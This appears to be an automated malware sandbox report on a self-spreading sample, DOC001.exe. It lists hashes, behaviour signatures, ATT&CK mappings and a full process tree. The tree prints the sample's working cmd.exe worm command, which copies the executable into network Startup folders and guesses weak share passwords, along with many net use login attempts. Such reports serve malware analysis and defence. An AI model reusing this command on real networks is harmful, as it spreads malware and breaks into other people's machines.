Overview

overview

10

Static

static

10

DOC001.exe

windows7-x64

8

DOC001.exe

windows10-2004-x64

8

$PLUGINSDIR/inetc.dll

windows7-x64

3

$PLUGINSDIR/inetc.dll

windows10-2004-x64

3

$R9/NsCpuC...32.exe

windows7-x64

10

$R9/NsCpuC...32.exe

windows10-2004-x64

10

$R9/NsCpuC...64.exe

windows7-x64

10

$R9/NsCpuC...64.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-12-2024 22:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DOC001.exe

  • Size

    1.1MB

  • MD5

    c720ac483a5752c2b69945a8ad673162

  • SHA1

    a91be77fa1bc117c34b3e652706e3b276b487769

  • SHA256

    856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78

  • SHA512

    68f7cde69539fa53692c358aa439a52e73ef9628427f3c9a3b310f71ec107d7dc6dc1a19323cad728b6ed6912eb0bf52e618c6097a1069e5d493b10e699ede82

  • SSDEEP

    12288:hhczyLe1sGZ7Bg5uPRwr05vzSBwepQZ2XcCDsceWiJklfViHen3wUN4uZycTWKCg:hE7ZtIvezxepQ4sGscezCPHN0QQRq4U

Score
8/10
defense_evasiondiscoverypersistence

Malware Config

Signatures

  • Indicator Removal: Network Share Connection Removal 1 TTPs 4 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

    defense_evasion
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 16 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 2 IoCs
    installer
  • Discovers systems in the same network 1 TTPs 2 IoCs
    discovery
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DOC001.exe
    "C:\Users\Admin\AppData\Local\Temp\DOC001.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4892
    • C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe
      "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1404
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
        3⤵
        • Indicator Removal: Network Share Connection Removal
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
          4⤵
          • Network Service Discovery
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\SysWOW64\net.exe
            net view
            5⤵
            • System Location Discovery: System Language Discovery
            • Discovers systems in the same network
            PID:3696
          • C:\Windows\SysWOW64\find.exe
            find /i "\\"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4948
          • C:\Windows\SysWOW64\ARP.EXE
            arp -a
            5⤵
            • Network Service Discovery
            • System Location Discovery: System Language Discovery
            PID:3632
          • C:\Windows\SysWOW64\find.exe
            find /i " 1"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c set str_
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3740
          • C:\Windows\SysWOW64\net.exe
            net view \\10.127.255.255
            5⤵
            • System Location Discovery: System Language Discovery
            • Discovers systems in the same network
            PID:4800
          • C:\Windows\SysWOW64\find.exe
            find /i " "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4744
        • C:\Windows\SysWOW64\net.exe
          net use * /delete /y
          4⤵
          • Indicator Removal: Network Share Connection Removal
          • System Location Discovery: System Language Discovery
          PID:4740
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3436
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1792
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1852
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • Enumerates system info in registry
          PID:3808
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1236
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:632
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ /delete /y
          4⤵
          • Indicator Removal: Network Share Connection Removal
          • System Location Discovery: System Language Discovery
          PID:3636
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 20 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4440
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5024
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo f"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3448
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /d "C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:3908
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users /delete /y
          4⤵
          • Indicator Removal: Network Share Connection Removal
          • System Location Discovery: System Language Discovery
          PID:4560
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 20 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4996
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1880
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ """" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:348
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users """" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2888
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4236
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3900
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4008
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:536
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3188
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users "1" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1564
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3340
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\C$ "123" /user:"1"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4188
        • C:\Windows\SysWOW64\net.exe
          net use \\10.127.255.255\Users "123" /user:"1"
          4⤵
            PID:4820
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4380
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "0" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4128
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "0" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2004
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3080
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ """" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1536
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users """" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3944
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:5092
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1476
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:576
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1724
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "1" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2852
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "1" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1556
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4368
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "123" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4340
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "123" /user:"10.127.255.255"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3176
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1852
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "0" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1984
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "0" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4892
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2920
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ """" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2564
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users """" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2956
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2392
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\C$ "administrator" /user:"administrator"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4632
          • C:\Windows\SysWOW64\net.exe
            net use \\10.127.255.255\Users "administrator" /user:"administrator"
            4⤵
              PID:444
            • C:\Windows\SysWOW64\PING.EXE
              ping -n 3 localhost
              4⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2212
            • C:\Windows\SysWOW64\net.exe
              net use \\10.127.255.255\C$ "1" /user:"administrator"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:648

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Indicator Removal

      1
      T1070

      Network Share Connection Removal

      1
      T1070.005

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Network Service Discovery

      1
      T1046

      Network Share Discovery

      1
      T1135

      Peripheral Device Discovery

      1
      T1120

      Query Registry

      3
      T1012

      Remote System Discovery

      2
      T1018

      System Information Discovery

      4
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      System Network Configuration Discovery

      1
      T1016

      Internet Connection Discovery

      1
      T1016.001

      Lateral Movement

      Collection

      Command and Control

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\nssB269.tmp\inetc.dll
        Filesize

        21KB

        MD5

        d7a3fa6a6c738b4a3c40d5602af20b08

        SHA1

        34fc75d97f640609cb6cadb001da2cb2c0b3538a

        SHA256

        67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

        SHA512

        75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Tempo\DOC001.exe
        Filesize

        1.1MB

        MD5

        c720ac483a5752c2b69945a8ad673162

        SHA1

        a91be77fa1bc117c34b3e652706e3b276b487769

        SHA256

        856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78

        SHA512

        68f7cde69539fa53692c358aa439a52e73ef9628427f3c9a3b310f71ec107d7dc6dc1a19323cad728b6ed6912eb0bf52e618c6097a1069e5d493b10e699ede82

        Download Submit